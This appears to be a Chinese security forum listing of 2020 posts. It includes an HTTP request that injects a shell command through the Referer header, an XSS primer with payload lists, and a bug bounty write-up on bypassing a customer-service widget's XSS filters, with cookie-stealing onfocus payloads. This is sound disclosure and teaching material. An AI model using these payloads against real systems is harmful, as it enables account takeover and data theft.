命令执行一则

渗透测试linkally 发表了文章 • 1 个评论 • 304 次浏览 • 2020-08-23 23:05 • 来自相关话题

GET /forwardUrl.htm HTTP/1.1
Content-Length: 0
Referer: dasdasdasd|ls -al /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: TY_SESSION_ID=e000c4ed-10c8-43f0-8262-eea285bdbb76;randomToken=24664601;PHPSESSID=uq0kne082sgoog5mov3qmrr6l
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip,deflate
Host: XXX 查看全部
GET /forwardUrl.htm HTTP/1.1
Content-Length: 0
Referer: dasdasdasd|ls -al /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: TY_SESSION_ID=e000c4ed-10c8-43f0-8262-eea285bdbb76;randomToken=24664601;PHPSESSID=uq0kne082sgoog5mov3qmrr6l
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip,deflate
Host: XXX

xxx影视平台的一次捡漏

渗透测试main 发表了文章 • 3 个评论 • 523 次浏览 • 2020-07-16 11:42 • 来自相关话题

在网页看动漫的时候,突然想到xxx是否有src,本来想着xxx安全应该挺好的,测试几天之后发现问题蛮多的。
 
存在的问题:
1.无限刷粉,粉丝在该平台有多重要:自媒体视频、直播、各种影视公司都是靠这些引流的
2.刷赞,一个视频上万赞也就分分钟
3.刷订阅,也是类似刷粉
4.刷好评,可以让一个垃圾电影轻轻松松上榜一
5.越权兑换体育会员,花别人的分,给自己换会员花
6.还有一些越权、xss、跨域、csrf
 
捡漏过程:(以刷粉丝为例,大家看一眼就会,想测的可以去测测,这个src比较容易)
 
关注的地方有很多,普通用户的关注接口,没有发现这样的问题。继续延展业务模块,注册xxxx之后就会发现里面也有关注粉丝的模块,发现接口不一样:
 
https://xxxxxx.com/interaction/list

 
点击关注的时候,抓包:
 

 
 
找个粉丝多的id: 在上面替换一下就行


 
 
 
 
 
漏洞都很简单,换成谁都会,包括问过一些牛批的师傅,他们大部分漏洞也都是很平常的,没有用到什么骚思路。既然漏洞都是很简单的,换做谁都能一眼看明白,关键就是发现的过程,没有人会告诉你哪里哪里可能存在问题,还是得自己慢慢找,没准下一分钟就找到了。
个人挖洞口诀:(坚持一个星期去了解了解业务,如果感觉实在挖不到就换下家吧,总不可能几十家src都没有一点收获)
耐心>能力>运气
 
欢迎各位师傅们评论区交流,平时挖哪家src,一起? 查看全部
在网页看动漫的时候,突然想到xxx是否有src,本来想着xxx安全应该挺好的,测试几天之后发现问题蛮多的。
 
存在的问题:
1.无限刷粉,粉丝在该平台有多重要:自媒体视频、直播、各种影视公司都是靠这些引流的
2.刷赞,一个视频上万赞也就分分钟
3.刷订阅,也是类似刷粉
4.刷好评,可以让一个垃圾电影轻轻松松上榜一
5.越权兑换体育会员,花别人的分,给自己换会员花
6.还有一些越权、xss、跨域、csrf
 
捡漏过程:(以刷粉丝为例,大家看一眼就会,想测的可以去测测,这个src比较容易)
 
关注的地方有很多,普通用户的关注接口,没有发现这样的问题。继续延展业务模块,注册xxxx之后就会发现里面也有关注粉丝的模块,发现接口不一样:
 
https://xxxxxx.com/interaction/list

 
点击关注的时候,抓包:
 

 
 
找个粉丝多的id: 在上面替换一下就行


 
 
 
 
 
漏洞都很简单,换成谁都会,包括问过一些牛批的师傅,他们大部分漏洞也都是很平常的,没有用到什么骚思路。既然漏洞都是很简单的,换做谁都能一眼看明白,关键就是发现的过程,没有人会告诉你哪里哪里可能存在问题,还是得自己慢慢找,没准下一分钟就找到了。
个人挖洞口诀:(坚持一个星期去了解了解业务,如果感觉实在挖不到就换下家吧,总不可能几十家src都没有一点收获)
耐心>能力>运气
 
欢迎各位师傅们评论区交流,平时挖哪家src,一起?

小白对XSS的初步了解

Web安全渗透SaiRson 发表了文章 • 1 个评论 • 325 次浏览 • 2020-06-02 16:35 • 来自相关话题

XSS又叫“CSS”(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往web页面里面插入恶意的JS(JavaScript)代码,当用户浏览该页之时,嵌入其中的Web里面的JS代码就会被执行,从而达到恶意的特殊目的。
利用我们所知道的各种方法,向Web页面插入JS代码,让JS代码可以被浏览器执行,访问该页面的用户就会被攻击
XSS漏洞的分类
1.反射型XSS,就是通过GET或POST请求时,被后端处理过数据,并且相应到前端页面上。
2.存储型XSS,所传的信息通过数据库并保存(XSS代码被存储到服务器上的数据库里面的某张表的字段里,或者页面,或者某个上传文件里)
3.DOM型XSS,仅仅在前端页面进行操作的
XSS漏洞的危害
1.窃取用户Cookie,如果用户Cookie被盗窃,攻击者可以不通过密码,而直接登录用户账户
2.使用XMLHttpRequest构造模拟用户请求操作
3.XSS钓鱼攻击(钓鱼网站)
4.用户PC信息探测收集器
5.XSS蠕虫攻击
等等
防御手段:
XSS攻击有两大因素:
1.攻击者恶意提交代码
2.浏览器执行恶意代码
根本解决方法:对输入,输出都对输入的字符,数字进行严格的过滤,转义
从输入方面:
对用户输入的点做限制:
URL参数
2.POST,GET等参数
将一些特殊符号转化为实体编码
其次对富文本的输入血药额外注意:
1.首先例行进行输入检测,保证用户输入的是完整的HTML代码,而不是有拼接的代码
2.通过htmlParser解析出HTML代码的标签,属性,事件
3富文本的事件要被禁止,因为富文本并不需要事件这种东西,另外一些危险的标签也要被禁止
如:<iframe>,<script>,<base>,<form>等
利用白名单机制,只允许安全的标签嵌入,列如:<a>,<img>,<div>等,白名单不仅仅适用于标签,属性也实用
5.过滤用户CSS,检测是否有危险代码

输出:
在输出时,所有需要输出到HTML页面的变量,全部需要使用编码或者转义来进行防御
在以下内容输出时也需要注意:
1.在HTML中输出
2.在JavaScript中输出
3.在CSS中输入
4.在URL中输出
常用的攻击代码:
<!--直接插入标签类-->
<script>alert('XSS');</script>
'"><script>alert('XSS')</script>
<img/src=1 onerror=alert(1)/>
'"><img/src=1 onerror=alert(1)/>

<!--插入属性类-->
' onmouseover=alert(1) x='
" onmouseover=alert(1) x="
` onmouseover=alert(1) x=`

<!--利用JavaScript等伪协议-->
javascript:alert(1)

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<!--data:资源类型;编码,内容-->

<!--先闭合前面标签,在构造新的标签-->
</script><script>alert(1)
作用与css里面
}x:experession(alert(1))
alert(1)//
<!--palyload分析-->
<!--1.如输出点在标签之间-->
<h1>输出点</h1>
<!--利用以上playload可构造成-->
<h1><script>alert("XSS");</script>
<h1><img/scr=1 onerror=alert(1)/></h1>
<!--输出点在元素标签中的属性值之间-->
<input type="text" value="'输入点'">
<input type="text" value="'aaa'"><script>alert('XSS');</script>'">
<input type="text" value="'aaa'"><img/src=1 onerror=alert(1)/>'">
<input type="text" value="(输出点)" >
<input type="text" value="(aaa)"><script>alert('XSS');</script>)">
<input type="text" value="输出点">
<input type="text" value="aaa" onmouseover=alert(1)>">
<input type="text" value="'输出点'">
<input type="text" value="'aaa'" onmouseover=alert(1)>'">
<input type="text" value="`输出点`">
<input type="text" value="`aaa`" onmouseover=alert(1)>`">
<input type="text" value="`aaa`"><script>alert(1);</script>
<!--输出在src/href/action等属性内,比如<a// href="输出点">click me</a>我们可以构造如下playload-->
<a href="输出点">click me<a>
<a href="javascript:alert(1)">click me</a>
<!--如果想使用data协议时,需要协议完整的出现>
<!--如果输出到on事件中。要根据不同的场景,要弄明白我们的输出是整个on事件的值还是以某个函数的参数出现-->
<a herf="#" onclick="eval('[输出]')">click me</a>
<!--直接提交alert(1)即可-->
<a herf="#" onlick="eval('alert(1)')">click me</a>
成为JavaScript代码出现:
<script> a="输出位";</script>
我们可以直接将其<script>标签闭合在重新构造标签
<script> a="输出位" </script><script>alert(1);"";</scropt>
或者直接在其中构造输出的代码
如alert(1);
成为CSS代码出现
输出如果出现在style属性内,对IE来说,style属性值只要能注入expression关键词即可,并进行适当的闭合
如:<a href="#" style="width:1px;"></a>
<a href="#" style=width:1px;x:expression(alert(1));">/></a>
 
 
 
  
以上是我对XSS的初步简介和总结的绕过姿势,希望各大老板帮我改错和补充 查看全部
XSS又叫“CSS”(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往web页面里面插入恶意的JS(JavaScript)代码,当用户浏览该页之时,嵌入其中的Web里面的JS代码就会被执行,从而达到恶意的特殊目的。
利用我们所知道的各种方法,向Web页面插入JS代码,让JS代码可以被浏览器执行,访问该页面的用户就会被攻击
XSS漏洞的分类
1.反射型XSS,就是通过GET或POST请求时,被后端处理过数据,并且相应到前端页面上。
2.存储型XSS,所传的信息通过数据库并保存(XSS代码被存储到服务器上的数据库里面的某张表的字段里,或者页面,或者某个上传文件里)
3.DOM型XSS,仅仅在前端页面进行操作的
XSS漏洞的危害
1.窃取用户Cookie,如果用户Cookie被盗窃,攻击者可以不通过密码,而直接登录用户账户
2.使用XMLHttpRequest构造模拟用户请求操作
3.XSS钓鱼攻击(钓鱼网站)
4.用户PC信息探测收集器
5.XSS蠕虫攻击
等等

防御手段:
XSS攻击有两大因素:
1.攻击者恶意提交代码
2.浏览器执行恶意代码
根本解决方法:对输入,输出都对输入的字符,数字进行严格的过滤,转义
从输入方面:
对用户输入的点做限制:
URL参数
2.POST,GET等参数
将一些特殊符号转化为实体编码
其次对富文本的输入血药额外注意:
1.首先例行进行输入检测,保证用户输入的是完整的HTML代码,而不是有拼接的代码
2.通过htmlParser解析出HTML代码的标签,属性,事件
3富文本的事件要被禁止,因为富文本并不需要事件这种东西,另外一些危险的标签也要被禁止
如:<iframe>,<script>,<base>,<form>等
利用白名单机制,只允许安全的标签嵌入,列如:<a>,<img>,<div>等,白名单不仅仅适用于标签,属性也实用
5.过滤用户CSS,检测是否有危险代码

输出:
在输出时,所有需要输出到HTML页面的变量,全部需要使用编码或者转义来进行防御
在以下内容输出时也需要注意:
1.在HTML中输出
2.在JavaScript中输出
3.在CSS中输入
4.在URL中输出

常用的攻击代码:
<!--直接插入标签类-->
<script>alert('XSS');</script>
'"><script>alert('XSS')</script>
<img/src=1 onerror=alert(1)/>
'"><img/src=1 onerror=alert(1)/>

<!--插入属性类-->
' onmouseover=alert(1) x='
" onmouseover=alert(1) x="
` onmouseover=alert(1) x=`

<!--利用JavaScript等伪协议-->
javascript:alert(1)

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<!--data:资源类型;编码,内容-->

<!--先闭合前面标签,在构造新的标签-->
</script><script>alert(1)
作用与css里面
}x:experession(alert(1))
alert(1)//

<!--palyload分析-->
<!--1.如输出点在标签之间-->
<h1>输出点</h1>
<!--利用以上playload可构造成-->
<h1><script>alert("XSS");</script>
<h1><img/scr=1 onerror=alert(1)/></h1>
<!--输出点在元素标签中的属性值之间-->
<input type="text" value="'输入点'">
<input type="text" value="'aaa'"><script>alert('XSS');</script>'">
<input type="text" value="'aaa'"><img/src=1 onerror=alert(1)/>'">
<input type="text" value="(输出点)" >
<input type="text" value="(aaa)"><script>alert('XSS');</script>)">
<input type="text" value="输出点">
<input type="text" value="aaa" onmouseover=alert(1)>">
<input type="text" value="'输出点'">
<input type="text" value="'aaa'" onmouseover=alert(1)>'">
<input type="text" value="`输出点`">
<input type="text" value="`aaa`" onmouseover=alert(1)>`">
<input type="text" value="`aaa`"><script>alert(1);</script>
<!--输出在src/href/action等属性内,比如<a// href="输出点">click me</a>我们可以构造如下playload-->
<a href="输出点">click me<a>
<a href="javascript:alert(1)">click me</a>
<!--如果想使用data协议时,需要协议完整的出现>
<!--如果输出到on事件中。要根据不同的场景,要弄明白我们的输出是整个on事件的值还是以某个函数的参数出现-->
<a herf="#" onclick="eval('[输出]')">click me</a>
<!--直接提交alert(1)即可-->
<a herf="#" onlick="eval('alert(1)')">click me</a>

成为JavaScript代码出现:
<script> a="输出位";</script>
我们可以直接将其<script>标签闭合在重新构造标签
<script> a="输出位" </script><script>alert(1);"";</scropt>
或者直接在其中构造输出的代码
如alert(1);

成为CSS代码出现
输出如果出现在style属性内,对IE来说,style属性值只要能注入expression关键词即可,并进行适当的闭合
如:<a href="#" style="width:1px;"></a>
<a href="#" style=width:1px;x:expression(alert(1));">/></a>

 

 

 

 
 
以上是我对XSS的初步简介和总结的绕过姿势,希望各大老板帮我改错和补充

赛克艾威漏洞预警(5月23-5月29号)

漏洞预警ypk 发表了文章 • 0 个评论 • 232 次浏览 • 2020-05-29 15:36 • 来自相关话题

详述一次拿shell后的单机信息搜集和贯穿整个内网的大型横向渗透(转)

渗透测试Mosuan 回复了问题 • 2 人关注 • 1 个回复 • 484 次浏览 • 2020-05-27 11:20 • 来自相关话题

赛克艾威漏洞预警(5月16-5月22号)

漏洞预警ypk 发表了文章 • 0 个评论 • 219 次浏览 • 2020-05-22 21:07 • 来自相关话题

赛克艾威漏洞预警(5月9-5月15号)

漏洞预警ypk 发表了文章 • 0 个评论 • 206 次浏览 • 2020-05-15 20:49 • 来自相关话题

赛克艾威漏洞预警(5月2-5月8号)

漏洞预警ypk 发表了文章 • 0 个评论 • 261 次浏览 • 2020-05-08 17:18 • 来自相关话题

棒打某客服系统的反射xss,去获取客服账号权限

Web安全渗透lzy_smile 发表了文章 • 0 个评论 • 568 次浏览 • 2020-05-05 22:13 • 来自相关话题

在三月份的某次测试中,测试到深夜,无果,我一般习惯扒拉扒拉自己的xss平台,(因为它有时候没有提醒),我就看到了一个没有见过的域名被打过来.





我当时凌乱了,这那来的站,没测啊,这个域名,我访问了返回的location字段打过来的域名,很棒的原谅绿.这个颜色我测过.





扒拉了许久,找到了这个页面(这个是我测试注册的号.不是百度,大佬轻喷)





众所周知,我们遇见了某个网站的客服系统时,势必要去x它,正常输入一个<img/src=1>,哇,裂图了,恭喜,喜提一枚xss漏洞,






 
标签没有正常解析,像这样.





唉,关机,不测了,又是零漏洞的一天.
 
我当时捋了捋思路,既然打过来了cookie,肯定哪里出了问题.
1.留言的时候有xss
2.聊天时有xss漏洞
我只是在这两点插入了js代码.难道是?留言处,
这个第三方组件很有趣,我直接找到了官网,可以注册使用,当即注册了一个账号测试.深入测试一下到底哪里出了问题.
我看到后台的xss代码在留言处并没有解析,那么试试聊天处.
我就这样打开了页面.(左边管理员,右边测试窗口.)





 
然后我就发现了猫腻,客户输入的时候, 他会解析输入的标签内容





既然以及解析了标签,那么离xss漏洞就剩一步了,先弹个窗试试.
第一次测的时候,竟然直接在这解析了<script>标签.这没什么好说的,收集一波案例先交上去,审核通过,
-----------------------------------------手动分割线-------------------------------
时隔一月,某平台又上新一任务,我发现又有这个系统,但此时不能直接解析<script>标签.onerror,onmouseover,onload,onmouserout等等自动触发xss代码的语句都被拦截了.
4-14号绕过,未对onclick这样的点击触发的事件进行拦截.
<img/src=1 onclik=alert(1)>测试成功,然后这个组件,第一次测得时候,没有深入去找給其它厂商的服务.某滴,某丰,某B.
除了某B的直接找到了,其它的后来和这个产品的客户经理在聊的时候,原来用的是用这个公司其它的产品.
空欢喜,
再接着去看客户案例时,我震惊了.用的厂商有点多.但是现在已经不能自动触发了,想着去让客服点击的时候,我想了几个方案,
1.<voide>标签可以解析,能够加载个视频.(加载个小视频,诱导客服点击很好用,)
2.<input>标签里面的onfocus事件可以加载js,
3.<marquee>标签走马灯标签可以在火狐浏览器加载onstart事件.
这三个事件基本够用了,
但是你直接输入这些标签,效果是这样的,并没有解析





但是我加了个img/src=1(有点东西,这神马玩意,这就解析了)










 
 

4-14号绕过payload:
12113imG/srC=1<Marquee style="background-color:red" onsTart=prompt(1)>asdf</marquee>

121111211121img/src=1<video id="video1" controls="controls" onclick=prompt(1))> <source src="https://www.w3school.com.cn/example/html5/mov_bbb.mp4" type="video/mp4"> </video>

你好1imG/SRc=1<inpuT autofocus onfocus=prompt(document.cookie)//
 
然后又等了几天,发现平台发布的某个任务系统也用了它的系统但是开发又修了,4-14号的paylaod已经不足以构成xss漏洞了.
所以4-18号绕过.
这次是对img src onclik onstart onfocus 等的小写事件进行拦截,无法加载.
很常规的进行大小写绕过,(对不起开发)
绕过paylaod
你好1imG/SRc=1<inpuT autofocus onfocuS=prompt(document.cookie)//
 
这次某平台的业务需要证明能够获取到页面数据,或者进行后台登陆,证明这个对他们有危害才算可以,那我这么菜.......
凌晨两点的我很惆怅,到嘴的鸭子就要飞了.然后求助,在神秘的A师傅的帮助下,第二天如愿以偿的获取到了页面数据,此时,它的密码是存储到了页面上,明文传输,客服系统就这样沦陷了,沦陷了.....





高危一枚!
 
思考:
1.测试的时候,遇见第三方组件,如果主站没有搞头,就去试试第三方组件,会有不少的收获
2.对于xss漏洞,不能仅限于设置httponly这些,像这个系统的明文传输密码,就是一个利用方法
3.对于测试过的漏洞,最好隔段时间去复测一下 查看全部
在三月份的某次测试中,测试到深夜,无果,我一般习惯扒拉扒拉自己的xss平台,(因为它有时候没有提醒),我就看到了一个没有见过的域名被打过来.

1.png

我当时凌乱了,这那来的站,没测啊,这个域名,我访问了返回的location字段打过来的域名,很棒的原谅绿.这个颜色我测过.

2.png

扒拉了许久,找到了这个页面(这个是我测试注册的号.不是百度,大佬轻喷)

3.png

众所周知,我们遇见了某个网站的客服系统时,势必要去x它,正常输入一个<img/src=1>,哇,裂图了,恭喜,喜提一枚xss漏洞,


4.png

 
标签没有正常解析,像这样.

5.png

唉,关机,不测了,又是零漏洞的一天.
 
我当时捋了捋思路,既然打过来了cookie,肯定哪里出了问题.
1.留言的时候有xss
2.聊天时有xss漏洞
我只是在这两点插入了js代码.难道是?留言处,
这个第三方组件很有趣,我直接找到了官网,可以注册使用,当即注册了一个账号测试.深入测试一下到底哪里出了问题.
我看到后台的xss代码在留言处并没有解析,那么试试聊天处.
我就这样打开了页面.(左边管理员,右边测试窗口.)

6.png

 
然后我就发现了猫腻,客户输入的时候, 他会解析输入的标签内容

7.png

既然以及解析了标签,那么离xss漏洞就剩一步了,先弹个窗试试.
第一次测的时候,竟然直接在这解析了<script>标签.这没什么好说的,收集一波案例先交上去,审核通过,
-----------------------------------------手动分割线-------------------------------
时隔一月,某平台又上新一任务,我发现又有这个系统,但此时不能直接解析<script>标签.onerror,onmouseover,onload,onmouserout等等自动触发xss代码的语句都被拦截了.
4-14号绕过,未对onclick这样的点击触发的事件进行拦截.
<img/src=1 onclik=alert(1)>测试成功,然后这个组件,第一次测得时候,没有深入去找給其它厂商的服务.某滴,某丰,某B.
除了某B的直接找到了,其它的后来和这个产品的客户经理在聊的时候,原来用的是用这个公司其它的产品.
空欢喜,
再接着去看客户案例时,我震惊了.用的厂商有点多.但是现在已经不能自动触发了,想着去让客服点击的时候,我想了几个方案,
1.<voide>标签可以解析,能够加载个视频.(加载个小视频,诱导客服点击很好用,)
2.<input>标签里面的onfocus事件可以加载js,
3.<marquee>标签走马灯标签可以在火狐浏览器加载onstart事件.
这三个事件基本够用了,
但是你直接输入这些标签,效果是这样的,并没有解析

8.png

但是我加了个img/src=1(有点东西,这神马玩意,这就解析了)

9.png


10.png

 
 

4-14号绕过payload:
12113imG/srC=1<Marquee style="background-color:red" onsTart=prompt(1)>asdf</marquee> 

121111211121img/src=1<video id="video1" controls="controls" onclick=prompt(1))> <source src="https://www.w3school.com.cn/example/html5/mov_bbb.mp4" type="video/mp4"> </video>

你好1imG/SRc=1<inpuT autofocus onfocus=prompt(document.cookie)//

 
然后又等了几天,发现平台发布的某个任务系统也用了它的系统但是开发又修了,4-14号的paylaod已经不足以构成xss漏洞了.
所以4-18号绕过.
这次是对img src onclik onstart onfocus 等的小写事件进行拦截,无法加载.
很常规的进行大小写绕过,(对不起开发)
绕过paylaod
你好1imG/SRc=1<inpuT autofocus onfocuS=prompt(document.cookie)//
 
这次某平台的业务需要证明能够获取到页面数据,或者进行后台登陆,证明这个对他们有危害才算可以,那我这么菜.......
凌晨两点的我很惆怅,到嘴的鸭子就要飞了.然后求助,在神秘的A师傅的帮助下,第二天如愿以偿的获取到了页面数据,此时,它的密码是存储到了页面上,明文传输,客服系统就这样沦陷了,沦陷了.....

11.png

高危一枚!
 
思考:
1.测试的时候,遇见第三方组件,如果主站没有搞头,就去试试第三方组件,会有不少的收获
2.对于xss漏洞,不能仅限于设置httponly这些,像这个系统的明文传输密码,就是一个利用方法
3.对于测试过的漏洞,最好隔段时间去复测一下

赛克艾威漏洞预警(4月25-5月1号)

漏洞预警ypk 发表了文章 • 0 个评论 • 250 次浏览 • 2020-05-03 21:04 • 来自相关话题